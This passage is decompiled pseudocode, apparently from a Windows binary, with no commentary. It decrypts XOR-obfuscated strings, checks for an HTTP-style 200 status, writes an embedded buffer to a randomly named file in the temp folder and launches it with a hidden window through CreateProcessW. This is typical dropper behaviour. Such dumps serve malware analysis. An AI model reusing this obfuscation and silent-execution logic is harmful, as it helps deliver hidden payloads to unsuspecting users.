				_t534 = _t533 ^ _t1033;
				_v32 = _t534;
				_push(_t1013);
				_push(_t1002);
				_push(_t534);
				 *[fs:0x0] =  &_v24;
				_v2552 = 0;
				_v560 = 0;
				_v16 = 0;
				_v772 = 0;
				_v756 = 0;
				_v752 = 7;
				_v772 = 0;
				_v16 = 2;
				if(GetTempPathW(0x104,  &_v556) == 0) {
					E004014B0(_t538, "Error: %d\n", 5);
					_t1039 = _t1039 + 8;
					L5:
					_push(0x530);
					_push(0);
					_push( &_v2540);
					L004139BD();
					_t541 =  *0x4159fc; // 0x209
					_t1040 = _t1039 + 0xc;
					_v2544 = _t541;
					_t902 = 0;
					_t542 =  *0x4159fe; // 0x33
					_v2542 = _t542;
					_push(1);
					_v2548 = 0;
					do {
						_t905 = _v2548;
						 *(_t1033 + _t905 - 0x9e4) =  *(_t1033 + _t905 - 0x9e4) ^ _t905 - (0xa0a0a0a1 * _t902 >> 0x00000020 >> 0x00000005) * 0x00000033 + 0x00000031;
						_t902 = _t905 + 1;
						_v2548 = _t902;
					} while (_t902 < 3);
					_push( &_v2544);
					_t1041 = _t1040 - 0x18;
					E0040C5D0(_t765, _t1041, _t765 + 8);
					E0040DB70( &_v2540, _t902);
					_v16 = 3;
					_t552 =  *(_v1316 + 4);
					if(( *(_t1033 +  *(_v1316 + 4) - 0x50c) & 0x00000006) != 0) {
						E004014B0(_t552, "Error: %d\n", 1);
						_t1041 = _t1041 + 8;
					}
					asm("movq xmm0, [0x415ae0]");
					_t553 =  *0x415ae8; // 0x3c313709
					_t1014 =  *0x41e540; // 0x6
					asm("movq [ebp-0xa2c], xmm0");
					_v2608 = _t553;
					if( *0x415aeb == 0) {
						L13:
						_t554 =  *0x415a68; // 0x14677776
						_t906 = 0;
						_v2592 = _t554;
						_t555 =  *0x415a6c; // 0x35
						_v2588 = _t555;
						_v2548 = 0;
						do {
							_t909 = _v2548;
							 *(_t1033 + _t909 - 0xa14) =  *(_t1033 + _t909 - 0xa14) ^ _t909 - (0xa0a0a0a1 * _t906 >> 0x00000020 >> 0x00000005) * 0x00000033 + 0x00000031;
							_t906 = _t909 + 1;
							_v2548 = _t906;
						} while (_t906 < 5);
						_t560 = E0040D930( &_v1300,  &_v2592);
						_t912 =  >=  ?  *((void*)(_t765 + 0x20)) : _t765 + 0x20;
						_t561 = E0040F3E0(_t560,  >=  ?  *((void*)(_t765 + 0x20)) : _t765 + 0x20,  *((intOrPtr*)(_t765 + 0x30)));
						_t1042 = _t1041 + 4;
						E0040D930(_t561,  &_v2616);
						_t563 =  *0x415ad4; // 0x383c
						_t914 = 0;
						_v2548 = _t563;
						_t564 =  *0x415ad6; // 0x33
						_v2546 = _t564;
						_v2544 = 0;
						do {
							_t917 = _v2544;
							 *(_t1033 + _t917 - 0x9e8) =  *(_t1033 + _t917 - 0x9e8) ^ _t917 - (0xa0a0a0a1 * _t914 >> 0x00000020 >> 0x00000005) * 0x00000033 + 0x00000031;
							_t914 = _t917 + 1;
							_v2544 = _t914;
						} while (_t914 < 3);
						_t569 =  *0x415824; // 0x40405d79
						_t918 = 0;
						_v2604 = _t569;
						_t570 =  *0x415828; // 0x160f
						_v2600 = _t570;
						_t571 =  *0x41582a; // 0x37
						_v2598 = _t571;
						_v2544 = 0;
						do {
							_t921 = _v2544;
							 *(_t1033 + _t921 - 0xa20) =  *(_t1033 + _t921 - 0xa20) ^ _t921 - (0xa0a0a0a1 * _t918 >> 0x00000020 >> 0x00000005) * 0x00000033 + 0x00000031;
							_t918 = _t921 + 1;
							_v2544 = _t918;
						} while (_t918 < 7);
						_t576 = E0040D930( &_v1300,  &_v2604);
						_t924 =  >=  ?  *((void*)(_t765 + 8)) : _t765 + 8;
						_t577 = E0040F3E0(_t576,  >=  ?  *((void*)(_t765 + 8)) : _t765 + 8,  *(_t765 + 0x18));
						_t1043 = _t1042 + 4;
						_t578 = E0040D930(_t577,  &_v2548);
						asm("movups xmm0, [0x41572c]");
						asm("movups [ebp-0xa3c], xmm0");
						asm("psrldq xmm0, 0xf");
						asm("movd eax, xmm0");
						if(_t578 == 0) {
							L25:
							E0040D930( &_v1300,  &_v2632);
							asm("movups xmm0, [0x415aac]");
							_t580 =  *0x415abc; // 0x44494f24
							_v2564 = _t580;
							asm("movups [ebp-0xa08], xmm0");
							if( *0x415abf == 0) {
								L31:
								E0040D930( &_v1300,  &_v2580);
								asm("movups xmm0, [0x415a90]");
								_t582 =  *0x415aa8; // 0x4c414743
								_v2636 = _t582;
								asm("movups [ebp-0xa58], xmm0");
								asm("movq xmm0, [0x415aa0]");
								asm("movq [ebp-0xa48], xmm0");
								if( *0x415aab == 0) {
									L37:
									E0040D930( &_v1300,  &_v2660);
									_v652 = 0;
									_v636 = 0;
									_v632 = 0xf;
									_v652 = 0;
									_v16 = 4;
									E0040F070( &_v1316,  &_v652);
									__imp__??5?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV01@AAI@Z( &_v560);
									_v724 = 0;
									_v708 = 0;
									_v704 = 0xf;
									_v724 = 0;
									_v16 = 5;
									__imp__?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEDD@Z(0xa);
									E0040F7F0( &_v1316,  &_v724,  *(_v1316 + 4) & 0x000000ff);
									_t1044 = _t1043 + 4;
									if(( *(_t1033 +  *(_v1316 + 4) - 0x50c) & 0x00000006) == 0) {
										L42:
										_v2541 = 0;
										L43:
										_t592 = _v2552;
										if((_t592 & 0x00000001) == 0) {
											L48:
											if(_v2541 != 0) {
												_t592 = E004014B0(_t592, "Error: %d\n", 2);
												_t1044 = _t1044 + 8;
											}
											if(_v560 != 0xc8) {
												E004014B0(_t592, "Error: %d\n", 3);
												_t1044 = _t1044 + 8;
											}
											_v676 = 0;
											_v660 = 0;
											_v656 = 0xf;
											_v676 = 0;
											_v16 = 6;
											while(1) {
												__imp__?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEDD@Z(0xa);
												_t931 =  &_v676;
												_t596 = E0040F7F0( &_v1316, _t931,  *(_v1316 + 4) & 0x000000ff);
												_t1004 = _v676;
												_t1044 = _t1044 + 4;
												if(( *( *((intOrPtr*)( *_t596 + 4)) + _t596 + 0xc) & 0x00000006) != 0) {
													break;
												}
												_t720 =  *0x415764; // 0x323c
												_v2544 = _t720;
												if(_t720 == 0) {
													L57:
													_t972 =  &_v2544;
													_t869 = _t972 + 1;
													do {
														_t721 =  *_t972;
														_t972 = _t972 + 1;
													} while (_t721 != 0);
													_t1029 = _v660;
													_t871 =  >=  ? _t1004 :  &_v676;
													if(_t1029 != _t972 - _t869) {
														continue;
													}
													_t931 =  &_v2544;
													_t1030 = _t1029 - 4;
													if(_t1030 < 0) {
														L63:
														if(_t1030 == 0xfffffffc) {
															L72:
															_t722 = 0;
															L73:
															if(_t722 != 0) {
																continue;
															}
															break;
														}
														L64:
														_t723 =  *_t871;
														if(_t723 !=  *_t931) {
															L71:
															asm("sbb eax, eax");
															_t722 = _t723 | 0x00000001;
															goto L73;
														}
														if(_t1030 == 0xfffffffd) {
															goto L72;
														}
														_t723 =  *((intOrPtr*)(_t871 + 1));
														if(_t723 != _t931[0]) {
															goto L71;
														}
														if(_t1030 == 0xfffffffe) {
															goto L72;
														}
														_t723 =  *((intOrPtr*)(_t871 + 2));
														if(_t723 != _t931[0]) {
															goto L71;
														}
														if(_t1030 == 0xffffffff) {
															goto L72;
														}
														_t723 =  *((intOrPtr*)(_t871 + 3));
														if(_t723 == _t931[0]) {
															goto L72;
														}
														goto L71;
													}
													while( *_t871 ==  *_t931) {
														_t871 = _t871 + 4;
														_t931 =  &(_t931[1]);
														_t1030 = _t1030 - 4;
														if(_t1030 >= 0) {
															continue;
														}
														goto L63;
													}
													goto L64;
												}
												_t974 = 0;
												_v2560 = 0;
												do {
													_t977 = _v2560;
													 *(_t1033 + _t977 - 0x9e4) =  *(_t1033 + _t977 - 0x9e4) ^ _t977 - (0xa0a0a0a1 * _t974 >> 0x00000020 >> 0x00000005) * 0x00000033 + 0x00000031;
													_t974 = _t977 + 1;
													_v2560 = _t974;
												} while (_t974 < 2);
												goto L57;
											}
											L004139BD();
											_t1044 = _t1044 + 8;
											E0040B340( &_v964,  &_v964);
											_v16 = 7;
											__imp__??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z( &_v2540, 0, 0xb0);
											E0040B260( &_v964,  &_v584);
											_t1014 = _v2552 | 0x00000002;
											_v2552 = _t1014;
											 *((intOrPtr*)(_t1033 +  *((intOrPtr*)(_v964 + 4)) - 0x3b8)) = 0x4159e8;
											_t274 = _v964 + 4; // 0x4165b8
											_t275 =  *_t274 - 0x68; // 0x416550
											 *((intOrPtr*)(_t1033 +  *_t274 - 0x3bc)) = _t275;
											E0040C0C0( &_v940);
											__imp__??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ();
											__imp__??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ();
											_v16 = 5;
											_t607 = _v656;
											if(_t607 < 0x10) {
												L78:
												_v16 = 4;
												_t932 = _v704;
												if(_t932 < 0x10) {
													L82:
													_v16 = 3;
													_t933 = _v632;
													if(_t933 < 0x10) {
														L87:
														__imp__??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ();
														E0040BA30( &_v2540);
														__imp__??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ();
														_v16 = 8;
														_t809 = _v568;
														if(_v564 - _t809 < 1) {
															_push(1);
															_t1045 = _t1044 - 8;
															_v2558 = 0;
															_push(_v2558);
															_push(1);
															_t611 = E0040FB10(_t765,  &_v584);
														} else {
															_t1028 =  >=  ? _v584 :  &_v584;
															_v568 = _t809 + 1;
															if(_t1028 >= 0x415699 || _t1028 + _t809 < " ") {
																_t1011 = 1;
															} else {
																if(_t1028 > " ") {
																	_t1011 = _t1028 - " ";
																} else {
																	_t1011 = 0;
																}
															}
															_push(_v568);
															_push(_t1028);
															_push(_t1028 + 1);
															L00413999();
															_push(_t1011);
															_push(" ");
															_push(_t1028);
															L004139A5();
															_push(1 - _t1011);
															_t307 = _t1011 + 0x415699; // 0x41569a
															_push(_t1028 + _t1011);
															L004139A5();
															_t1014 = _v2552;
															_t611 =  &_v584;
															_t1045 = _t1044 + 0x24;
														}
														_v700 = 0;
														_v684 = 0;
														_v680 = 0;
														asm("movups xmm0, [eax]");
														_v2552 = _t1014 | 0x00000008;
														asm("movups [ebp-0x2b0], xmm0");
														asm("movq xmm0, [eax+0x10]");
														asm("movq [ebp-0x2a0], xmm0");
														 *(_t611 + 0x10) = 0;
														 *(_t611 + 0x14) = 0xf;
														 *_t611 = 0;
														_v16 = 0xa;
														_t935 = _v564;
														if(_t935 >= 0x10) {
															_t864 = _v584;
															_t970 = _t935 + 1;
															_t702 = _t864;
															if(_t970 >= 0x1000) {
																_t864 =  *((intOrPtr*)(_t864 - 4));
																_t970 = _t970 + 0x23;
																if(_t702 > 0x1f) {
																	__imp___invalid_parameter_noinfo_noreturn();
																}
															}
															_push(_t970);
															E00412FD5(_t702, _t864);
															_t1045 = _t1045 + 8;
														}
														_t1017 = _v684;
														_v568 = 0;
														_v564 = 0xf;
														_v584 = 0;
														if(_v680 < 0x10) {
															_t1018 = _t1017 +  &_v700;
															_t1005 =  &_v700;
														} else {
															_t1005 = _v700;
															_t1018 = _t1017 + _t1005;
														}
														_v608 = 0;
														_v608 = 0;
														_v592 = 0;
														_v588 = 7;
														E0040C480(_t765, _t1018 - _t1005);
														_v2560 =  &_v608;
														_v16 = 0xb;
														if(_t1005 == _t1018) {
															L110:
															_v16 = 0xd;
															_v2584 = 0;
															_v2568 = 0;
															memcpy( &_v916, 0x415858, 0x1f << 2);
															_t1046 = _t1045 + 0xc;
															_v2564 = 7;
															_v2584 = 0;
															asm("movsw");
															_t1020 = 0;
															_v560 = _v2552 | 0x00000010;
															if( *0x41e540 < 2) {
																do {
																	L114:
																	 *(_t1033 + _t1020 * 2 - 0x388) =  *(_t1033 + _t1020 * 2 - 0x388) ^ _t1020 - (0xa0a0a0a1 * _t1020 >> 0x00000020 >> 0x00000005) * 0x00000033 + 0x00000031;
																	_t1020 = _t1020 + 1;
																} while (_t1020 < 0x3f);
																L115:
																_v584 = 0;
																_t818 =  &_v916;
																_v568 = 0;
																_v564 = 7;
																_t938 = _t818 + 2;
																_v584 = 0;
																do {
																	_t625 =  *_t818;
																	_t818 = _t818 + 2;
																} while (_t625 != 0);
																_t627 = E0040D040(_t765,  &_v584, 0x415896, _t1020,  &_v916, _t818 - _t938 >> 1);
																_v16 = 0xe;
																__imp___time64(0);
																__imp___getpid();
																srand(_t627 * _t627);
																_t1047 = _t1046 + 8;
																E0040C480(_t765, 0xf);
																_t1009 = 0xf;
																_t1022 = _v584;
																_v2541 = _v564 - 8 >= 0;
																do {
																	_t630 = rand();
																	_t824 = _v2568;
																	_t633 =  !=  ? _t1022 :  &_v584;
																	_t941 =  *(( !=  ? _t1022 :  &_v584) + _t630 % 0x17 * 2) & 0x0000ffff;
																	if(_t824 >= _v2564) {
																		_push(_t941);
																		_v2558 = 0;
																		_push(_v2558);
																		_push(_t824);
																		E0040E150(_t765,  &_v2584, _t1009);
																	} else {
																		_t397 = _t824 + 1; // 0x1
																		_v2568 = _t397;
																		_t694 =  >=  ? _v2584 :  &_v2584;
																		 *(_t694 + _t824 * 2) = _t941;
																		 *((short*)(_t694 + 2 + _t824 * 2)) = 0;
																	}
																	_t1022 = _v584;
																	_t1009 = _t1009 - 1;
																} while (_t1009 != 0);
																_v16 = 0xd;
																if(_v2541 == 0) {
																	L126:
																	_t636 = E0040DD50( &_v724,  &_v772,  &_v2584);
																	_v16 = 0xf;
																	E0040DE70( &_v748, _t636);
																	_t1047 = _t1047 + 4;
																	_v16 = 0x11;
																	_t944 = _v704;
																	if(_t944 < 8) {
																		L130:
																		_v708 = 0;
																		_v704 = 7;
																		_v724 = 0;
																		_v16 = 0x12;
																		_t945 = _v2564;
																		if(_t945 < 8) {
																			L135:
																			_v2568 = 0;
																			_v2584 = 0;
																			_v2564 = 7;
																			L004139BD();
																			_t642 =  >=  ? _v748 :  &_v748;
																			E0040B070( &_v1212, _t945,  >=  ? _v748 :  &_v748);
																			_v16 = 0x13;
																			__imp__?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBD_J@Z(0x41b030, 0x2000, 0,  &_v1212, 0, 0xb0);
																			_t644 = E0040C9A0( &_v1208);
																			if(_t644 == 0) {
																				__imp__?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z(2, _t644);
																			}
																			_push(0x44);
																			_push(0);
																			_push( &_v1036);
																			L004139BD();
																			_v1036.cb = 0x44;
																			_t1048 = _t1047 + 0xc;
																			_v584 = 0;
																			asm("xorps xmm0, xmm0");
																			_v1036.wShowWindow = 0;
																			_t947 =  >=  ? _v608 :  &_v608;
																			_t831 =  >=  ? _v608 :  &_v608;
																			_v568 = 0;
																			asm("movups [ebp-0x308], xmm0");
																			_v564 = 7;
																			_v584 = 0;
																			_t460 = _t831 + 2; // 0x2
																			_t1024 = _t460;
																			do {
																				_t647 =  *_t831;
																				_t831 = _t831 + 2;
																				_t1164 = _t647;
																			} while (_t647 != 0);
																			E0040D040(_t765,  &_v584, _t1009, _t1024, _t947, _t831 - _t1024 >> 1);
																			_v16 = 0x14;
																			_t652 = E00412FE3((_v568 + 1) * 2, _t765, _t1009, _t1024,  ~(0 | _t1164 > 0x00000000) | (_v568 + 0x00000001) * 0x00000002);
																			_t951 =  >=  ? _v584 :  &_v584;
																			_v560 = _t652;
																			_t654 =  >=  ? _v584 :  &_v584;
																			_t1025 = _v560;
																			_push(( >=  ? _v584 :  &_v584) + _v568 * 2 - _t654);
																			_push(_t654);
																			_push(_t1025);
																			L00413999();
																			_t1049 = _t1048 + 0x10;
																			_t1025[_v568] = 0;
																			_t657 =  >=  ? _v748 :  &_v748;
																			CreateProcessW( >=  ? _v748 :  &_v748, _t1025, 0, 0, 0, 0x8000000, 0, 0,  &_v1036,  &_v788);
																			_t952 = _v564;
																			if(_t952 >= 8) {
																				_t856 = _v584;
																				_t964 = 2 + _t952 * 2;
																				_t677 = _t856;
																				if(_t964 >= 0x1000) {
																					_t856 =  *(_t856 - 4);
																					_t964 = _t964 + 0x23;
																					if(_t677 > 0x1f) {
																						__imp___invalid_parameter_noinfo_noreturn();
																					}
																				}
																				_push(_t964);
																				E00412FD5(_t677, _t856);
																				_t1049 = _t1049 + 8;
																			}
																			E00406D00( &_v1212);
																			_t953 = _v728;
																			if(_t953 < 8) {
																				L148:
																				_t954 = _v588;
																				_v732 = 0;
																				_v728 = 7;
																				_v748 = 0;
																				if(_t954 < 8) {
																					L152:
																					_t955 = _v680;
																					_t661 = 0;
																					_v592 = 0;
																					_v588 = 7;
																					_v608 = 0;
																					if(_t955 < 0x10) {
																						L156:
																						_t956 = _v752;
																						_v684 = 0;
																						_v680 = 0xf;
																						_v700 = 0;
																						if(_t956 < 8) {
																							L160:
																							_t957 =  *(_t765 + 0x1c);
																							if(_t957 < 0x10) {
																								L164:
																								_t958 =  *(_t765 + 0x34);
																								 *(_t765 + 0x18) = 0;
																								 *(_t765 + 0x1c) = 0xf;
																								 *((char*)(_t765 + 8)) = 0;
																								if(_t958 < 0x10) {
																									goto L169;
																								}
																								_t850 =  *((intOrPtr*)(_t765 + 0x20));
																								_t958 =  &(_t958[0]);
																								_t663 = _t850;
																								if(_t958 < 0x1000) {
																									goto L168;
																								}
																								_t850 =  *((intOrPtr*)(_t850 - 4));
																								_t958 =  &(_t958[8]);
																								if(_t663 <= 0x1f) {
																									goto L168;
																								}
																								goto L167;
																							}
																							_t851 =  *((intOrPtr*)(_t765 + 8));
																							_t959 =  &(_t957->nLength);
																							_t665 = _t851;
																							if(_t959 < 0x1000) {
																								L163:
																								_push(_t959);
																								_t661 = E00412FD5(_t665, _t851);
																								_t1049 = _t1049 + 8;
																								goto L164;
																							}
																							_t850 =  *((intOrPtr*)(_t851 - 4));
																							_t958 =  &(_t959[8]);
																							_t663 = _t665 - _t850 + 0xfffffffc;
																							if(_t665 - _t850 + 0xfffffffc > 0x1f) {
																								goto L167;
																							}
																							goto L163;
																						}
																						_t852 = _v772;
																						_t960 = 2 + _t956 * 2;
																						_t667 = _t852;
																						if(_t960 < 0x1000) {
																							L159:
																							_push(_t960);
																							_t661 = E00412FD5(_t667, _t852);
																							_t1049 = _t1049 + 8;
																							goto L160;
																						}
																						_t850 =  *((intOrPtr*)(_t852 - 4));
																						_t958 = _t960 + 0x23;
																						_t663 = _t667 - _t850 + 0xfffffffc;
																						if(_t667 - _t850 + 0xfffffffc > 0x1f) {
																							goto L167;
																						}
																						goto L159;
																					}
																					_t853 = _v700;
																					_t961 =  &(_t955->nLength);
																					_t669 = _t853;
																					if(_t961 < 0x1000) {
																						L155:
																						_push(_t961);
																						_t661 = E00412FD5(_t669, _t853);
																						_t1049 = _t1049 + 8;
																						goto L156;
																					}
																					_t850 =  *((intOrPtr*)(_t853 - 4));
																					_t958 = _t961 + 0x23;
																					_t663 = _t669 - _t850 + 0xfffffffc;
																					if(_t669 - _t850 + 0xfffffffc > 0x1f) {
																						goto L167;
																					}
																					goto L155;
																				}
																				_t854 = _v608;
																				_t962 = 2 + _t954 * 2;
																				_t671 = _t854;
																				if(_t962 < 0x1000) {
																					L151:
																					_push(_t962);
																					E00412FD5(_t671, _t854);
																					_t1049 = _t1049 + 8;
																					goto L152;
																				}
																				_t850 =  *((intOrPtr*)(_t854 - 4));
																				_t958 = _t962 + 0x23;
																				_t663 = _t671 - _t850 + 0xfffffffc;
																				if(_t671 - _t850 + 0xfffffffc > 0x1f) {
																					goto L167;
																				}
																				goto L151;
																			} else {
																				_t855 = _v748;
																				_t963 = 2 + _t953 * 2;
																				_t674 = _t855;
																				if(_t963 < 0x1000) {
																					L147:
																					_push(_t963);
																					E00412FD5(_t674, _t855);
																					_t1049 = _t1049 + 8;
																					goto L148;
																				}
																				_t850 =  *((intOrPtr*)(_t855 - 4));
																				_t958 = _t963 + 0x23;
																				_t663 = _t674 - _t850 + 0xfffffffc;
																				if(_t674 - _t850 + 0xfffffffc > 0x1f) {
																					L167:
																					__imp___invalid_parameter_noinfo_noreturn();
																					L168:
																					_push(_t958);
																					_t661 = E00412FD5(_t663, _t850);
																					L169:
																					 *[fs:0x0] = _v24;
																					_pop(_t1010);
																					_pop(_t1026);
																					return E00412A1E(_t661, _t765, _v32 ^ _t1033, _t958, _t1010, _t1026);
																				}
																				goto L147;
																			}
																		}
																		_t859 = _v2584;
																		_t945 = 2 + _t945 * 2;
																		_t682 = _t859;
																		if(_t945 < 0x1000) {
																			L134:
																			_push(_t945);
																			E00412FD5(_t682, _t859);
																			_t1047 = _t1047 + 8;
																			goto L135;
																		}
																		_t859 =  *(_t859 - 4);
																		_t945 = _t945 + 0x23;
																		if(_t682 <= 0x1f) {
																			goto L134;
																		}
																		L133:
																		__imp___invalid_parameter_noinfo_noreturn();
																		goto L134;
																	}
																	_t860 = _v724;
																	_t965 = 2 + _t944 * 2;
																	_t685 = _t860;
																	if(_t965 < 0x1000) {
																		L129:
																		_push(_t965);
																		E00412FD5(_t685, _t860);
																		_t1047 = _t1047 + 8;
																		goto L130;
																	}
																	_t859 =  *(_t860 - 4);
																	_t945 = _t965 + 0x23;
																	_t682 = _t685 - _t859 + 0xfffffffc;
																	if(_t685 - _t859 + 0xfffffffc > 0x1f) {
																		goto L133;
																	}
																	goto L129;
																}
																_t861 = _t1022;
																_t966 = 2 + _v564 * 2;
																_t689 = _t861;
																if(_t966 < 0x1000) {
																	L125:
																	_push(_t966);
																	E00412FD5(_t689, _t861);
																	_t1047 = _t1047 + 8;
																	goto L126;
																}
																_t859 =  *(_t861 - 4);
																_t945 = _t966 + 0x23;
																_t682 = _t689 - _t859 + 0xfffffffc;
																if(_t689 - _t859 + 0xfffffffc > 0x1f) {
																	goto L133;
																}
																goto L125;
															}
															asm("movaps xmm4, [0x415af0]");
															asm("movaps xmm3, [0x415b60]");
															asm("movaps xmm5, [0x415b20]");
															asm("movaps xmm7, [0x415b30]");
															asm("movd xmm6, eax");
															do {
																asm("movd xmm0, esi");
																asm("pshufd xmm2, xmm0, 0x0");
																asm("paddd xmm2, xmm4");
																asm("movaps xmm1, xmm2");
																asm("movaps xmm0, xmm2");
																asm("punpckldq xmm1, xmm2");
																asm("punpckhdq xmm0, xmm2");
																asm("pmuludq xmm1, xmm3");
																asm("pmuludq xmm0, xmm3");
																asm("shufps xmm1, xmm0, 0xdd");
																asm("psrld xmm1, xmm6");
																asm("pmulld xmm1, xmm5");
																asm("psubd xmm2, xmm1");
																asm("pshuflw xmm0, xmm2, 0xd8");
																asm("pshufhw xmm0, xmm0, 0xd8");
																asm("pshufd xmm1, xmm0, 0xd8");
																asm("movq xmm0, xmm7");
																asm("paddw xmm1, xmm0");
																asm("movq xmm0, [ebp+esi*2-0x388]");
																asm("pxor xmm1, xmm0");
																asm("movd xmm0, eax");
																asm("movq [ebp+esi*2-0x388], xmm1");
																asm("pshufd xmm2, xmm0, 0x0");
																asm("paddd xmm2, xmm4");
																asm("movaps xmm1, xmm2");
																asm("movaps xmm0, xmm2");
																asm("punpckldq xmm1, xmm2");
																asm("punpckhdq xmm0, xmm2");
																asm("pmuludq xmm1, xmm3");
																asm("pmuludq xmm0, xmm3");
																asm("shufps xmm1, xmm0, 0xdd");
																asm("psrld xmm1, xmm6");
																asm("pmulld xmm1, xmm5");
																asm("psubd xmm2, xmm1");
																asm("pshuflw xmm0, xmm2, 0xd8");
																asm("pshufhw xmm0, xmm0, 0xd8");
																asm("pshufd xmm1, xmm0, 0xd8");
																asm("movq xmm0, xmm7");
																asm("paddw xmm1, xmm0");
																asm("movq xmm0, [ebp+esi*2-0x380]");
																asm("pxor xmm1, xmm0");
																asm("movq [ebp+esi*2-0x380], xmm1");
																_t1020 = _t1020 + 8;
															} while (_t1020 < 0x38);
															if(_t1020 >= 0x3f) {
																goto L115;
															}
															goto L114;
														} else {
															do {
																_t862 = _v592;
																_t968 =  *_t1005 & 0x0000ffff;
																if(_t862 >= _v588) {
																	_push(_t968);
																	_v560 = 0;
																	_push(_v560);
																	_push(_t862);
																	E0040E150(_t765,  &_v608, _t1005);
																} else {
																	_t342 = _t862 + 1; // 0x8
																	_v592 = _t342;
																	_t701 =  >=  ? _v608 :  &_v608;
																	 *(_t701 + _t862 * 2) = _t968;
																	 *((short*)(_t701 + 2 + _t862 * 2)) = 0;
																}
																_t1005 =  &(_t1005[1]);
															} while (_t1005 != _t1018);
															goto L110;
														}
													}
													_t866 = _v652;
													_t931 =  &(_t933->nLength);
													_t711 = _t866;
													if(_t931 < 0x1000) {
														L86:
														_push(_t931);
														E00412FD5(_t711, _t866);
														_t1044 = _t1044 + 8;
														goto L87;
													}
													_t866 =  *((intOrPtr*)(_t866 - 4));
													_t931 =  &(_t931[8]);
													if(_t711 <= 0x1f) {
														goto L86;
													}
													L85:
													__imp___invalid_parameter_noinfo_noreturn();
													goto L86;
												}
												_t867 = _v724;
												_t971 = _t932 + 1;
												_t714 = _t867;
												if(_t971 < 0x1000) {
													L81:
													_push(_t971);
													E00412FD5(_t714, _t867);
													_t1044 = _t1044 + 8;
													goto L82;
												}
												_t866 =  *((intOrPtr*)(_t867 - 4));
												_t931 = _t971 + 0x23;
												_t711 = _t714 - _t866 + 0xfffffffc;
												if(_t714 - _t866 + 0xfffffffc > 0x1f) {
													goto L85;
												}
												goto L81;
											}
											_t283 =  &(_t607->nLength); // 0x10
											_t868 = _t283;
											_t717 = _t1004;
											if(_t868 < 0x1000) {
												L77:
												_push(_t868);
												E00412FD5(_t717, _t1004);
												_t1044 = _t1044 + 8;
												goto L78;
											}
											_t1004 =  *((intOrPtr*)(_t1004 - 4));
											_t866 = _t868 + 0x23;
											_t711 = _t717 - _t1004 + 0xfffffffc;
											if(_t717 - _t1004 + 0xfffffffc > 0x1f) {
												goto L85;
											}
											goto L77;
										}
										_t978 = _v656;
										_v2552 = _t592;
										if(_t978 < 0x10) {
											goto L48;
										}
										_t875 = _v676;
										_t979 =  &(_t978->nLength);
										_t730 = _t875;
										if(_t979 < 0x1000) {
											L47:
											_push(_t979);
											_t592 = E00412FD5(_t730, _t875);
											_t1044 = _t1044 + 8;
											goto L48;
										}
										_t866 =  *((intOrPtr*)(_t875 - 4));
										_t931 = _t979 + 0x23;
										_t711 = _t730 - _t866 + 0xfffffffc;
										if(_t730 - _t866 + 0xfffffffc > 0x1f) {
											goto L85;
										}
										goto L47;
									}
									_v676 = 0;
									_v660 = 0;
									_t877 =  <  ? _v636 : 5;
									_push( <  ? _v636 : 5);
									_t733 =  >=  ? _v652 :  &_v652;
									_v656 = 0xf;
									E0040D1A0(_t765,  &_v676, 5, _t1014,  >=  ? _v652 :  &_v652);
									_t735 =  *0x4157cc; // 0x64676679
									_v2560 = _t735;
									_t736 =  *0x4157d0; // 0x361a
									_v2552 = 5;
									_v2556 = _t736;
									if(_t736 == 0) {
										L41:
										_t737 = E0040DCC0( &_v676,  &_v2560);
										_v2541 = 1;
										if(_t737 != 0) {
											goto L43;
										}
										goto L42;
									}
									_t981 = 0;
									_v2544 = 0;
									do {
										_t984 = _v2544;
										 *(_t1033 + _t984 - 0x9f4) =  *(_t1033 + _t984 - 0x9f4) ^ _t984 - (0xa0a0a0a1 * _t981 >> 0x00000020 >> 0x00000005) * 0x00000033 + 0x00000031;
										_t981 = _t984 + 1;
										_v2544 = _t981;
									} while (_t981 < 6);
									goto L41;
								}
								_t985 = 0;
								_v2544 = 0;
								if(_t1014 < 2) {
									do {
										L36:
										_t988 = _v2544;
										 *(_t1033 + _t988 - 0xa58) =  *(_t1033 + _t988 - 0xa58) ^ _t988 - (0xa0a0a0a1 * _t985 >> 0x00000020 >> 0x00000005) * 0x00000033 + 0x00000031;
										_t985 = _t988 + 1;
										_v2544 = _t985;
									} while (_t985 < 0x1c);
									goto L37;
								}
								asm("movaps xmm0, [0x415b50]");
								_t144 = _t985 + 4; // 0x4
								_t746 = _t144;
								asm("movaps xmm4, [0x415af0]");
								asm("movaps xmm3, [0x415b60]");
								asm("movaps xmm5, [0x415b20]");
								asm("movaps [ebp-0x280], xmm0");
								asm("movd xmm6, edi");
								do {
									asm("movd xmm0, edx");
									_t985 = _t985 + 8;
									asm("pshufd xmm2, xmm0, 0x0");
									asm("paddd xmm2, xmm4");
									asm("movaps xmm1, xmm2");
									asm("movaps xmm0, xmm2");
									asm("punpckldq xmm1, xmm2");
									asm("pmuludq xmm1, xmm3");
									asm("punpckhdq xmm0, xmm2");
									asm("pmuludq xmm0, xmm3");
									asm("shufps xmm1, xmm0, 0xdd");
									asm("psrld xmm1, xmm6");
									asm("pmulld xmm1, xmm5");
									asm("psubd xmm2, xmm1");
									asm("pshuflw xmm0, xmm2, 0xd8");
									asm("pshufhw xmm0, xmm0, 0xd8");
									asm("pshufd xmm1, xmm0, 0xd8");
									asm("pand xmm1, [0x415b40]");
									asm("packuswb xmm1, xmm1");
									asm("movd xmm0, ecx");
									asm("paddb xmm1, xmm0");
									asm("movd xmm0, dword [ebp+eax-0xa5c]");
									asm("pxor xmm1, xmm0");
									asm("movd xmm0, eax");
									asm("movd [ebp+eax-0xa5c], xmm1");
									asm("pshufd xmm2, xmm0, 0x0");
									asm("paddd xmm2, xmm4");
									asm("movaps xmm1, xmm2");
									asm("movaps xmm0, xmm2");
									asm("punpckldq xmm1, xmm2");
									asm("pmuludq xmm1, xmm3");
									asm("punpckhdq xmm0, xmm2");
									asm("pmuludq xmm0, xmm3");
									asm("shufps xmm1, xmm0, 0xdd");
